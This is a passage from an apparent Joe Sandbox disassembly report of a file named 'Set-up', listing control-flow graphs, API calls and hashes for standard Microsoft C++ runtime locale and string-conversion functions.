?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z 1587->1606 1607 6bc34f9e-6bc34fa4 1587->1607 1608 6bc34f5d-6bc34f69 1587->1608 1609 6bc34ffc-6bc34fff 1587->1609 1610 6bc3501c-6bc35025 1587->1610 1611 6bc35097-6bc350a5 call 6bc24983 1588->1611 1612 6bc34ebc-6bc34edd ?_Getfmt@?$time_get@GV?$istreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@IBE?AV?$istreambuf_iterator@GU?$char_traits@G@std@@@2@V32@0AAVios_base@2@AAHPAUtm@@PBD@Z 1589->1612 1590->1612 1626 6bc34e85-6bc34e88 1591->1626 1614 6bc34f4f-6bc34f50 1592->1614 1593->1611 1619 6bc34f8f-6bc34f99 1593->1619 1594->1626 1595->1612 1596->1612 1597->1612 1598->1614 1599->1626 1600->1614 1601->1611 1615 6bc35056-6bc3505c 1601->1615 1618 6bc34f1f 1602->1618 1603->1588 1632 6bc34fd4-6bc34fdd 1603->1632 1604->1612 1605->1612 1606->1611 1616 6bc34f02-6bc34f08 1606->1616 1613 6bc34fa5-6bc34fa7 1607->1613 1608->1618 1609->1613 1610->1614 1630 6bc350a7 1611->1630 1631 6bc350aa-6bc350bb 1611->1631 1612->1626 1613->1614 1622 6bc34f21-6bc34f34 ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z 1614->1622 1624 6bc35062-6bc35065 1615->1624 1625 6bc34f0b-6bc34f11 1615->1625 1616->1625 1618->1622 1619->1611 1622->1611 1624->1625 1625->1611 1626->1611 1630->1631 1632->1611
                                                                                              APIs
                                                                                              • ?_Getfmt@?$time_get@GV?$istreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@IBE?AV?$istreambuf_iterator@GU?$char_traits@G@std@@@2@V32@0AAVios_base@2@AAHPAUtm@@PBD@Z.MSVCP100(?,?,?,?,?,?,?,?,%m / %d / %y), ref: 6BC34ED0
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000000,00000063,?), ref: 6BC34EEF
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000000,00000017,?), ref: 6BC34F2A
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000000C,?,0000016E,?,00000001,0000001F,?,%b %d %H : %M : %S %Y), ref: 6BC34F7C
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000000,00000063,?,%d / %m / %y,00000006,?,%I : %M : %S %p,?,?,?,6BC11D60,0000016E,?), ref: 6BC35047
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_V?$istreambuf_iterator@_$Getint@?$time_get@_W@std@@@2@0W@std@@@std@@@std@@$U?$char_traits@V?$istreambuf_iterator@$G@std@@@2@G@std@@@std@@@std@@Getfmt@?$time_get@Utm@@V32@0Vios_base@2@
                                                                                              • String ID: %H : %M$%H : %M : S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                              • API String ID: 832312750-2659852414
                                                                                              • Opcode ID: a934b370486baac7f06e20bbe6c6c070b8e5bafa7d69d824b4d2eced167d7ba4
                                                                                              • Instruction ID: 3ac767c753a64f807de66b047549deaa185eb25b7f2e27a6468662b9f70c4a55
                                                                                              • Opcode Fuzzy Hash: a934b370486baac7f06e20bbe6c6c070b8e5bafa7d69d824b4d2eced167d7ba4
                                                                                              • Instruction Fuzzy Hash: 40811472514219EFCB05CF98C941DDA7BB9FF09704F404559FA15EA251E33AEB10DBA0
                                                                                              Function 6BC3A9CF Relevance: 21.1, APIs: 14, Instructions: 145COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1633 6bc3a9cf-6bc3a9dd 1634 6bc3a9f6 1633->1634 1635 6bc3a9df-6bc3a9e3 1633->1635 1637 6bc3a9f8-6bc3a9fc 1634->1637 1635->1634 1636 6bc3a9e5-6bc3a9e8 1635->1636 1638 6bc3a9ea-6bc3a9ef 1636->1638 1639 6bc3a9fd-6bc3aa02 1636->1639 1638->1634 1640 6bc3a9f1-6bc3a9f3 1638->1640 1641 6bc3aa15-6bc3aa17 1639->1641 1642 6bc3aa04-6bc3aa13 ___lc_handle_func ___lc_codepage_func 1639->1642 1640->1634 1643 6bc3aa1a-6bc3aa1f 1641->1643 1642->1643 1644 6bc3aa33-6bc3aa47 call 6bc3a8cc 1643->1644 1645 6bc3aa21-6bc3aa26 1643->1645 1650 6bc3aa49-6bc3aa5b ___mb_cur_max_l_func 1644->1650 1651 6bc3aa9e-6bc3aaa0 1644->1651 1646 6bc3aa28-6bc3aa2b 1645->1646 1647 6bc3aa2e-6bc3aa31 1645->1647 1646->1647 1647->1637 1652 6bc3aa87 1650->1652 1653 6bc3aa5d-6bc3aa79 MultiByteToWideChar 1650->1653 1654 6bc3aaa2-6bc3aab4 __pctype_func 1651->1654 1655 6bc3aab6-6bc3aac1 1651->1655 1658 6bc3aa8a-6bc3aa99 _errno 1652->1658 1653->1652 1657 6bc3aa7b-6bc3aa7f ___mb_cur_max_l_func 1653->1657 1656 6bc3aac4-6bc3aac6 1654->1656 1655->1656 1659 6bc3ab25-6bc3ab41 MultiByteToWideChar 1656->1659 1660 6bc3aac8-6bc3aad5 ___mb_cur_max_l_func 1656->1660 1661 6bc3aa81-6bc3aa82 1657->1661 1658->1637 1659->1647 1664 6bc3ab47 1659->1664 1662 6bc3aae3-6bc3aaec ___mb_cur_max_l_func 1660->1662 1663 6bc3aad7-6bc3aade 1660->1663 1661->1637 1665 6bc3ab11-6bc3ab15 1662->1665 1666 6bc3aaee-6bc3ab0f ___mb_cur_max_l_func MultiByteToWideChar 1662->1666 1663->1637 1664->1658 1665->1652 1667 6bc3ab1b-6bc3ab20 ___mb_cur_max_l_func 1665->1667 1666->1665 1666->1667 1667->1661
                                                                                              APIs
                                                                                              • ___lc_handle_func.MSVCR100 ref: 6BC3AA04
                                                                                              • ___lc_codepage_func.MSVCR100 ref: 6BC3AA0D
                                                                                              • _GetLocaleForCP.MSVCP100(?,00000001,00000001,00000000,00000000,?,6BC2249E,00000000,?,00000001,00000000), ref: 6BC3AA36
                                                                                              • ___mb_cur_max_l_func.MSVCR100(00000000,00000001,00000001,00000000,00000000,?,6BC2249E,00000000,?,00000001,00000000), ref: 6BC3AA55
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000002,?,00000000,6BC2249E,00000000,?,00000001,00000000), ref: 6BC3AA71
                                                                                              • ___mb_cur_max_l_func.MSVCR100(00000000), ref: 6BC3AA7F
                                                                                              • _errno.MSVCR100 ref: 6BC3AA8A
                                                                                              • __pctype_func.MSVCR100 ref: 6BC3AAA2
                                                                                              • ___mb_cur_max_l_func.MSVCR100(00000000,00000001,00000001,00000000,00000000,?,6BC2249E,00000000,?,00000001,00000000), ref: 6BC3AACF
                                                                                              • ___mb_cur_max_l_func.MSVCR100(00000000,6BC2249E,00000000,?,00000001,00000000), ref: 6BC3AAE6
                                                                                              • ___mb_cur_max_l_func.MSVCR100(00000000,?,00000000,?,?,00000000), ref: 6BC3AAFD
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000), ref: 6BC3AB07
                                                                                              • ___mb_cur_max_l_func.MSVCR100(00000000,?,?,00000000), ref: 6BC3AB1E
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,00000001,00000001,00000000,00000000,?,6BC2249E,00000000,?,00000001,00000000), ref: 6BC3AB39
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___mb_cur_max_l_func$ByteCharMultiWide$Locale___lc_codepage_func___lc_handle_func__pctype_func_errno
                                                                                              • String ID:
                                                                                              • API String ID: 233324532-0
                                                                                              • Opcode ID: 0cdda67a927d399f1326a60eaa7275f6eedade9d53bc7b09dbcb80012ed7dc8a
                                                                                              • Instruction ID: 52f22c3d6e4fcde7fb647e6edbfaa31c66d833262e357cce322e24d350cbc199
                                                                                              • Opcode Fuzzy Hash: 0cdda67a927d399f1326a60eaa7275f6eedade9d53bc7b09dbcb80012ed7dc8a
                                                                                              • Instruction Fuzzy Hash: B141EF32A24275AFDF014F24C845B5D7BB8FF46712F5081A5F820EA090E738CA60DFA0
                                                                                              Function 6BC3C3A1 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 116COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1668 6bc3c3a1-6bc3c3ec call 6bc4378b call 6bc3ad4d localeconv call 6bc23503 1675 6bc3c3f3 1668->1675 1676 6bc3c3ee-6bc3c3f1 1668->1676 1677 6bc3c3f6-6bc3c40e call 6bc2241f 1675->1677 1676->1677 1680 6bc3c413-6bc3c42b call 6bc2241f 1677->1680 1681 6bc3c410 1677->1681 1684 6bc3c430-6bc3c46c call 6bc2241f call 6bc223ec * 2 1680->1684 1685 6bc3c42d 1680->1685 1681->1680 1692 6bc3c473 1684->1692 1693 6bc3c46e-6bc3c471 1684->1693 1685->1684 1694 6bc3c476-6bc3c47e 1692->1694 1693->1694 1695 6bc3c480-6bc3c483 1694->1695 1696 6bc3c485 1694->1696 1695->1696 1697 6bc3c489-6bc3c4c4 call 6bc40c4b * 2 1695->1697 1696->1697 1702 6bc3c4e2-6bc3c4e7 call 6bc43801 1697->1702 1703 6bc3c4c6-6bc3c4df memcpy * 2 1697->1703 1703->1702
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC3C3A8
                                                                                              • _Getcvt.MSVCP100(00000008,6BC3CE1B,00000000,00000001,00000028,6BC3D09B,?,?,00000000,00000000,00000014,6BC3EC23,?,0000000C,6BC3962C,?), ref: 6BC3C3B2
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_handle_func.MSVCR100 ref: 6BC3AD50
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_codepage_func.MSVCR100 ref: 6BC3AD59
                                                                                              • localeconv.MSVCR100 ref: 6BC3C3BF
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC3C3DD
                                                                                                • Part of subcall function 6BC23503: strlen.MSVCR100 ref: 6BC2350E
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC3C3FA
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC3C417
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC3C434
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC3C449
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC3C45C
                                                                                              • memcpy.MSVCR100(?,$+xv,00000004,?,?,?,?,?,?,?,?), ref: 6BC3C4CF
                                                                                              • memcpy.MSVCR100(?,$+xv,00000004,?,$+xv,00000004,?,?,?,?,?,?,?,?), ref: 6BC3C4DA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Maklocstr$Maklocchrmemcpy$GetcvtH_prolog3_catch___lc_codepage_func___lc_handle_funclocaleconvstrlen
                                                                                              • String ID: $+xv
                                                                                              • API String ID: 1198873623-1686923651
                                                                                              • Opcode ID: 4d89b69c7a108e6e294d20a1ac22ec13ce77e3a0391a2ffeb3593edea2876981
                                                                                              • Instruction ID: 66ccc81d1763f29c8c82e4f5c0c3897202a2c7497063520d1b43d74932341579
                                                                                              • Opcode Fuzzy Hash: 4d89b69c7a108e6e294d20a1ac22ec13ce77e3a0391a2ffeb3593edea2876981
                                                                                              • Instruction Fuzzy Hash: 064182F0924B51AFD720CF74C891B2BBBF8AF09204F04465AE599DB940E738E7148BA5
                                                                                              Function 6BC3CB92 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3CB99
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3F114,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3CBA3
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3F114,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3CBBA
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3CBC3
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT ref: 6BC3CBDD
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3F114,?,0000000C,6BC39639,?,?,?,?,?,?,?,?), ref: 6BC3CBF1
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3CC00
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3F114,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3CC10
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3CC16
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3F114,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3CC23
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              • Opcode ID: 7a410b1d43abc4f3193e618789836c9877b632836f2c1a282dbcefe8e279c5de
                                                                                              • Instruction ID: 800ec9e83953912975661c21d75852ec57906d4009ff83e5b8a032a8d9629d9c
                                                                                              • Opcode Fuzzy Hash: 7a410b1d43abc4f3193e618789836c9877b632836f2c1a282dbcefe8e279c5de
                                                                                              • Instruction Fuzzy Hash: 2F01A1319206399BCF01DBB0C956AEE7331AF81724F940568E120BB290FF3C9B019B61
                                                                                              Function 6BC39AE0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC39AE7
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3F3CE,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC39AF1
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3F3CE,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC39B08
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC39B11
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • ?_Getcat@?$codecvt@GDH@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP100(?,?,00000000,00000000,00000014,6BC3F3CE,?,0000000C,6BC39639,?,?,?,?,?,?,?), ref: 6BC39B2B
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3F3CE,?,0000000C,6BC39639,?,?,?,?,?,?,?,?), ref: 6BC39B3F
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC39B4E
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3F3CE,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC39B5E
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC39B64
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3F3CE,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC39B71
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_Getcat@?$codecvt@GetfacetGetgloballocale@locale@std@@H@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowV42@@Vfacet@locale@2@std::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 2050830734-3145022300
                                                                                              • Opcode ID: 54019ff60281cc33cdf1969f31ed703a85ce780ab00043fecd4998765629896d
                                                                                              • Instruction ID: 53d1f631ddfc3b156a43f483748ab07c5f430244dde5d08c18c2dc236b894998
                                                                                              • Opcode Fuzzy Hash: 54019ff60281cc33cdf1969f31ed703a85ce780ab00043fecd4998765629896d
                                                                                              • Instruction Fuzzy Hash: DC01A13292052997CF01DBB0C852AAD7335AF81728F540568E121BB290FF7C9B01DB61
                                                                                              Function 6BC3CAEF Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3CAF6
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3F0A7,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3CB00
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3F0A7,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3CB17
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3CB20
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • messages.LIBCPMT ref: 6BC3CB3A
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3F0A7,?,0000000C,6BC39639,?,?,?,?,?,?,?,?), ref: 6BC3CB4E
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3CB5D
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3F0A7,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3CB6D
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3CB73
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3F0A7,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3CB80
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowmessagesstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 4221931714-3145022300
                                                                                              • Opcode ID: e60abde0a874eb2bc7dd0c4054ecd4caf418bd43957e18eef5dd02046ef45dc2
                                                                                              • Instruction ID: 4e40e959d2824acdac19dd42f8bfa4b6239a56982c98bd43ed37cad4539659fd
                                                                                              • Opcode Fuzzy Hash: e60abde0a874eb2bc7dd0c4054ecd4caf418bd43957e18eef5dd02046ef45dc2
                                                                                              • Instruction Fuzzy Hash: E501613192063997CF05DBB4C852AAE7335BF85728F940568E520BB290FB3C9B069B61
                                                                                              Function 6BC3CA4C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3CA53
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3ED82,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3CA5D
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3ED82,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3CA74
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3CA7D
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • ?_Getcat@?$time_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP100(?,?,00000000,00000000,00000014,6BC3ED82,?,0000000C,6BC3962C,?,?,?,?,?,?,?), ref: 6BC3CA97
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3ED82,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?), ref: 6BC3CAAB
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3CABA
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3ED82,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3CACA
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3CAD0
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3ED82,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3CADD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_Getcat@?$time_put@_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowU?$char_traits@_V42@@V?$ostreambuf_iterator@_Vfacet@locale@2@W@std@@@std@@@std@@std::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 3029389365-3145022300
                                                                                              • Opcode ID: 21c7fe3a9636847d78763a07354c8a779fa425387f998952ed347dcdf7bea5a7
                                                                                              • Instruction ID: b3915e3983e1ec665bbec5205180d215d61defcf18f4d2efa6b7c178d865cfa1
                                                                                              • Opcode Fuzzy Hash: 21c7fe3a9636847d78763a07354c8a779fa425387f998952ed347dcdf7bea5a7
                                                                                              • Instruction Fuzzy Hash: 8F01C43192063997CF01DBB0C852AAE7335BF80724F940529E120BB2D0FB3C9B01DB61
